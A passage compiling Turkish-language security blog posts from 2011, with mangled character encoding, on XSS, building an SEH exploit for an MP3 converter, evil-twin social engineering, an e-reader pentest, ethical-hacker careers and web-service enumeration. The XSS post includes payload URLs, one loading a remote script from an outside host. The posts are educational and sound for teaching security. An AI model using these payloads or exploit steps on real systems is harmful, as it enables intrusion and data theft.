sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

